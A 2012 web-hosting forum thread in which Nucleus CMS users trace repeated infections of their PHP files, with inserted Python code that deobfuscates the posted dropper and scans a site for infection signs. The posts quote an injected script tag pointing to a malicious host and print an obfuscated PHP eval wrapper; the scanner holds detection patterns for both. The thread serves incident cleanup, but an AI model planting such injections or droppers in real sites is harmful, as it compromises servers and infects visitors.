Security Hole!

elliottoman
Posts: 18
Joined: Thu May 12, 2011 4:19 pm
Location: Kingston, NY


Postby elliottoman » Mon Oct 01, 2012 12:40 pm

It's come to my attention that every Nucleus-based site on my server is being used to host a malicious script. The script is being generated by every page on every Nucleus-based site, automatically inserted (regardless of skin structure) just before the </body> tag. It looks something like this:


<script src="http://syn20tax.rr.nu/nl.php?p=d"></script>


...but the URLs appear to be generated randomly.

Is there anything I can do short of taking the sites down entirely? And is there any hope that a security patch will be released to correct this vulnerability?
elliottoman
Posts: 18
Joined: Thu May 12, 2011 4:19 pm
Location: Kingston, NY

Postby elliottoman » Mon Oct 01, 2012 3:26 pm

Further inspection revealed that the Nucleus admin itself was not compromised; the code had been injected into nearly every PHP file on my server—it just happens that most of them were used for Nucleus.
ftruscot
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts

Postby ftruscot » Mon Oct 01, 2012 4:08 pm

Often it's a server or FTP vulnerability that causes this. Cleaning it out is not fun. One of the first things you should do is change all your passwords and make sure the systems you use to connect to your hosting control panel are all free of viruses.

On the nucleus side, you should be sure to be at the latest version, which is presently 3.64.
Is your question not solved yet?
Search our FAQ,
read the Documentation, or
browse the list of available plugins.

Check out my plugins
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA

Postby Imajica » Tue Oct 09, 2012 12:50 pm

I got hit with it again as well

This code is on every PHP page:


<?php
$md5 = "1b2763805e2a68237c83383f154f261c";
$ae = array("(","s","e",'t',"_",'v',';','4',"z","f",'o','l','c',")","g","b",'6','i',"n",'a','d','$','r');
$bee = create_function('$'.'v',$ae[2].$ae[5].$ae[19].$ae[11].$ae[0].$ae[14].$ae[8].$ae[17].$ae[18].$ae[9].$ae[11].$ae[19].$ae[3].$ae[2].$ae[0].$ae[15].$ae[19].$ae[1].$ae[2].$ae[16].$ae[7].$ae[4].$ae[20].$ae[2].$ae[12].$ae[10].$ae[20].$ae[2].$ae[0].$ae[21].$ae[5].$ae[13].$ae[13].$ae[13].$ae[6]);
$bee('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');
?>


I've changed every password on the system and I can't figure out how they are getting in.
I'm off to reset again
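The wrapper in the posted snippet hides what it does by assembling its source one character at a time from the `$ae` array. An analyst never needs to run it to find out what it builds: the indices can be resolved statically. The following is an added example (my own code, not from the thread or the Nucleus project) that transcribes the first two statements of the posted dropper, rebuilds the string handed to `create_function()`, and lists which decode/execute primitives it calls. The `$bee('...')` call, whose compressed payload is not reproduced on this page, is deliberately left out; the script executes nothing from the sample.

```python
import re

# Transcription of the dropper's first two statements as posted in the thread above.
# The third statement, $bee('...'), carried the compressed payload, which is not
# reproduced here; this script only recovers what the wrapper does and runs nothing.
POSTED = r'''$ae = array("(","s","e",'t',"_",'v',';','4',"z","f",'o','l','c',")","g","b",'6','i',"n",'a','d','$','r');
$bee = create_function('$'.'v',$ae[2].$ae[5].$ae[19].$ae[11].$ae[0].$ae[14].$ae[8].$ae[17].$ae[18].$ae[9].$ae[11].$ae[19].$ae[3].$ae[2].$ae[0].$ae[15].$ae[19].$ae[1].$ae[2].$ae[16].$ae[7].$ae[4].$ae[20].$ae[2].$ae[12].$ae[10].$ae[20].$ae[2].$ae[0].$ae[21].$ae[5].$ae[13].$ae[13].$ae[13].$ae[6]);'''

# PHP functions whose appearance in a reconstructed body is a strong sign of a
# packed, eval'd second stage.
DANGEROUS_CALLS = ("eval", "create_function", "gzinflate", "gzuncompress",
                   "base64_decode", "str_rot13", "assert", "preg_replace")


def parse_char_array(src, var):
    """Return the elements of `$var = array(...)` as Python strings.

    Only single- and double-quoted literal elements are handled, which is all the
    posted sample uses."""
    m = re.search(r"\$" + re.escape(var) + r"\s*=\s*array\((.*?)\);", src, re.S)
    if not m:
        raise ValueError("no array assignment for $" + var)
    return [dq or sq for dq, sq in re.findall(r'"([^"]*)"|\'([^\']*)\'', m.group(1))]


def resolve_indices(expr, table, var):
    """Replace a `$var[i].$var[j]...` concatenation by the characters it selects."""
    pattern = r"\$" + re.escape(var) + r"\[(\d+)\]"
    return "".join(table[int(i)] for i in re.findall(pattern, expr))


def deobfuscate(src, var="ae"):
    """Statically rebuild the parameter and body that create_function() would compile."""
    table = parse_char_array(src, var)
    m = re.search(r"create_function\(((?:'[^']*'\.?)+),\s*(.*?)\);", src, re.S)
    if not m:
        raise ValueError("no create_function() call found")
    param = "".join(re.findall(r"'([^']*)'", m.group(1)))  # '$'.'v' -> $v
    body = resolve_indices(m.group(2), table, var)
    return {"param": param, "body": body}


def suspicious_calls(body):
    """Which of the known decode/execute primitives the rebuilt body calls."""
    return {fn for fn in DANGEROUS_CALLS if re.search(r"\b" + fn + r"\s*\(", body)}


if __name__ == "__main__":
    info = deobfuscate(POSTED)
    print("create_function(%r, %r)" % (info["param"], info["body"]))
    print("calls:", sorted(suspicious_calls(info["body"])))
```

Run against the transcription, the body resolves to a one-line decompress-and-eval wrapper, so the real behaviour lives entirely in the payload string that the wrapper is fed. That is why every infected file looks identical apart from that string, and why a cleanup has to look for the wrapper pattern rather than for any particular payload.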
ftruscot
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts

Postby ftruscot » Tue Oct 09, 2012 12:57 pm

Is Nucleus up to date? Other PHP programs up to date? Are there any strange PHP files in the media folder?
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA

Postby Imajica » Wed Oct 10, 2012 4:35 am

Nucleus is up to date, and no odd PHP files.

On one site there is a Coppermine gallery in need of a patch, but that is currently disabled because I'm betting that is the issue.
ftruscot
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts

Postby ftruscot » Wed Oct 10, 2012 10:59 pm

Sometimes leaving the files on the server can still leave you vulnerable even if the app is "turned off". Maybe rename the folder containing it so that it's hard to find (not in a known location).
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA

Postby Imajica » Thu Oct 11, 2012 3:28 am

Yeah, that's exactly what I did... buried it in a different folder outside the web directory.

It sucks trying to recover from this kind of hack.
ftruscot
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts

Postby ftruscot » Thu Oct 11, 2012 3:31 am

Yes. It does. Can you use file modification times to determine which file may be the first one hacked?
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA

Postby Imajica » Fri Oct 12, 2012 3:15 am

They got me again... and that was after removing the Coppermine gallery.

Looks like all the PHP files inside 1 site were modified within 1 min.
ftruscot
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts

Postby ftruscot » Fri Oct 12, 2012 3:26 am

Wow. Have you changed your FTP password? Any .htaccess files get modified? Are all your PHP files Nucleus files?

I'd be happy to look at the site tomorrow if you trust me. You can email me at my gmail.com address. The username part is ftruscot.
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA

Postby Imajica » Fri Oct 12, 2012 3:33 am

You may still have a login on my system; let me check.

Yep, FTP passwords were changed, no .htaccess files, and yes, I think all the PHP files (at this point) are Nucleus.
WillyP
Nucleus Guru
Posts: 872
Joined: Sun Aug 30, 2009 3:29 am
Location: Pembroke, NH

Postby WillyP » Sun Oct 14, 2012 3:09 pm

Make sure you check all the files, code can be run from inside any file, even images.
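Two points from the thread translate directly into a triage script: ftruscot's suggestion to use file modification times to find the first file touched, and WillyP's reminder that the payload can sit in any file, not only `.php` ones. The following is an added example of my own (not code from the thread or from Nucleus) that walks a site directory, flags files matching the indicators described in this thread (a `<script>` tag injected immediately before `</body>`, a `create_function()` wrapper built from an indexed character array, and a PHP open tag inside a file that should not contain one), sorts the hits by mtime, and groups files rewritten within a one-minute window. It builds its own constructed sample tree in a temporary directory; the file names, contents and timestamps there are made up for the demonstration.

```python
import os
import re
import shutil
import tempfile

# Indicators drawn from what the thread reports: a <script> tag injected right before
# </body>, a create_function() wrapper assembled from an indexed character array, and
# (WillyP's point) PHP code hiding in files that are not supposed to contain any.
INDICATORS = {
    "script-before-body": re.compile(
        r"<script\s+src=[\"'][^\"']+[\"']>\s*</script>\s*</body>", re.I),
    "create_function-dropper": re.compile(
        r"create_function\(.*?\$\w+\[\d+\]", re.S),
    "php-tag-in-non-php": re.compile(r"<\?php", re.I),
}
PHP_EXTENSIONS = (".php", ".inc", ".phtml")


def scan_file(path):
    """Return the names of every indicator that fires on `path`."""
    try:
        with open(path, "rb") as fh:
            text = fh.read().decode("latin-1")  # byte-preserving, never raises on binaries
    except OSError:
        return []
    is_php = path.lower().endswith(PHP_EXTENSIONS)
    hits = []
    for name, rx in INDICATORS.items():
        if name == "php-tag-in-non-php" and is_php:
            continue  # PHP in a .php file is expected; the other two checks still run
        if rx.search(text):
            hits.append(name)
    return hits


def scan_tree(root):
    """Walk `root`, flag every file with an indicator, oldest mtime first."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                results.append({
                    "path": os.path.relpath(path, root).replace(os.sep, "/"),
                    "mtime": os.path.getmtime(path),
                    "hits": hits,
                })
    results.sort(key=lambda r: r["mtime"])
    return results


def cluster_by_mtime(results, window=60):
    """Group already-sorted hits whose mtimes chain within `window` seconds.

    A large cluster is the mass rewrite pass; a lone, earlier file is the better
    candidate for the initial foothold."""
    clusters = []
    for r in results:
        if clusters and r["mtime"] - clusters[-1][-1]["mtime"] <= window:
            clusters[-1].append(r)
        else:
            clusters.append([r])
    return clusters


def build_sample_site(root):
    """Constructed sample tree (not data from the thread): paths, contents and
    mtimes are made up to exercise the scanner."""
    base = 1_349_000_000  # arbitrary epoch seconds
    files = {
        "index.php": (
            "<?php include 'sample.php'; ?>\n<html><body>hello"
            "<script src=\"http://example.invalid/x.php?p=d\"></script></body></html>",
            base + 3600),
        "nucleus/libs/sample.php": (
            "<?php\n$ae = array(\"(\",\"s\");\n$bee = create_function('$v', $ae[0].$ae[1]);\n",
            base + 3610),
        "media/photo.jpg": ("\xff\xd8\xff <?php /* constructed stub */ ?>", base),
        "media/clean.jpg": ("\xff\xd8\xff just pixels", base - 50000),
        "skins/default/style.css": ("body { margin: 0 }", base - 90000),
    }
    for rel, (content, mtime) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content.encode("latin-1"))
        os.utime(path, (mtime, mtime))


def demo():
    """Build the sample site in a temp dir, scan it, and return (results, clusters)."""
    root = tempfile.mkdtemp(prefix="nucleus-triage-")
    try:
        build_sample_site(root)
        results = scan_tree(root)
        return results, cluster_by_mtime(results)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    results, clusters = demo()
    for i, group in enumerate(clusters, 1):
        print("cluster %d (%d file(s)):" % (i, len(group)))
        for r in group:
            print("  %s  mtime=%d  %s" % (r["path"], r["mtime"], ", ".join(r["hits"])))
```

On the constructed tree the image file is the lone early hit and the two PHP files form the one-minute cluster, which is the shape Imajica describes. On a real site, pass the web root to `scan_tree()` and treat the earliest isolated hit as the place to start looking; mtimes can be reset by an attacker, so this narrows the search rather than proving anything on its own.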
ftruscot
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts

Postby ftruscot » Mon Oct 15, 2012 3:40 pm

That's a good point, WillyP.
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA

Postby Imajica » Thu Oct 18, 2012 1:49 am

Sorry... off the charts slammed at work.

I've grabbed all the files off the server and am running a scan on them now.
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA

Postby Imajica » Sun Oct 21, 2012 1:43 am

And I got hit again... sheesh.
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA

Postby Imajica » Tue Oct 23, 2012 2:05 am

Think I found it... my honeypot was compromised.
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA

Postby Imajica » Wed Oct 24, 2012 3:01 pm

Nope, that wasn't it.

My Barracuda firewall is detecting this:
Spyware.Exploit.Misc.MU.url-of-site

Seems to be always at 1:11am Central.
Well, I'm off to change passwords.

At least this time it seems to be isolated to just 2 sites.
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA

Postby Imajica » Fri Oct 26, 2012 4:37 am

Got it (I think).

There were a bunch of extra files in /nucleus/plugins/colorbox/style1/images/internet_explorer and /nucleus/documentation/devdocs/styles that I must have missed during the last cleanup.
